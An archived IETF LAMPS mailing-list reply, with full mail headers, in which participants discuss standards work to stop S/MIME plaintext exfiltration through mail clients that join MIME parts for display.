Re: [lamps] More mail madness?
Russ Housley <housley@vigilsec.com> Mon, 14 May 2018 16:37 UTC
Return-Path: <housley@vigilsec.com>
X-Original-To: spasm@ietfa.amsl.com
Delivered-To: spasm@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 25989126C22 for <spasm@ietfa.amsl.com>; Mon, 14 May 2018 09:37:35 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -1.899
X-Spam-Level:
X-Spam-Status: No, score=-1.899 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, HTML_MESSAGE=0.001, RCVD_IN_DNSWL_NONE=-0.0001] autolearn=unavailable autolearn_force=no
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id x-7S5zIkV-Ur for <spasm@ietfa.amsl.com>; Mon, 14 May 2018 09:37:32 -0700 (PDT)
Received: from mail.smeinc.net (mail.smeinc.net [209.135.209.11]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id BD78512DA04 for <spasm@ietf.org>; Mon, 14 May 2018 09:37:32 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by mail.smeinc.net (Postfix) with ESMTP id 802F0300AC8 for <spasm@ietf.org>; Mon, 14 May 2018 12:37:30 -0400 (EDT)
X-Virus-Scanned: amavisd-new at mail.smeinc.net
Received: from mail.smeinc.net ([127.0.0.1]) by localhost (mail.smeinc.net [127.0.0.1]) (amavisd-new, port 10026) with ESMTP id V4z5rIWSvSsG for <spasm@ietf.org>; Mon, 14 May 2018 12:37:28 -0400 (EDT)
Received: from new-host.home (pool-108-45-101-150.washdc.fios.verizon.net [108.45.101.150]) by mail.smeinc.net (Postfix) with ESMTPSA id AE17C300AC7; Mon, 14 May 2018 12:37:27 -0400 (EDT)
From: Russ Housley <housley@vigilsec.com>
Message-Id: <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
Content-Type: multipart/alternative; boundary="Apple-Mail=_CE3BEB20-BA89-44BD-A4FD-7BA157BE713F"
Mime-Version: 1.0 (Mac OS X Mail 10.3 \(3273\))
Date: Mon, 14 May 2018 12:37:28 -0400
In-Reply-To: <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>, LAMPS <spasm@ietf.org>
To: Paul Wouters <paul@nohats.ca>
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com> <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
X-Mailer: Apple Mail (2.3273)
Archived-At: <https://mailarchive.ietf.org/arch/msg/spasm/xWk_UViXEpZcRyxiOB3BfPLxU7A>
Subject: Re: [lamps] More mail madness?
X-BeenThere: spasm@ietf.org
X-Mailman-Version: 2.1.22
Precedence: list
List-Id: "This is a venue for discussion of doing Some Pkix And SMime \(spasm\) work." <spasm.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/spasm>, <mailto:spasm-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/spasm/>
List-Post: <mailto:spasm@ietf.org>
List-Help: <mailto:spasm-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/spasm>, <mailto:spasm-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 14 May 2018 16:37:35 -0000
> On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote: > >> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote: >> >> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox. The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL. > > So that’s the bandaid. What and where will work be done on a solution? LAMPS just sent an update to the S/MIME message document to the IESG. My guess is that there will be discussion on the spasm@ietf.org <mailto:spasm@ietf.org> mail list. Russ
- Re: [lamps] More mail madness? Russ Housley
- Re: [lamps] More mail madness? Richard Barnes
- Re: [lamps] More mail madness? Phillip Hallam-Baker
- Re: [lamps] More mail madness? Jim Schaad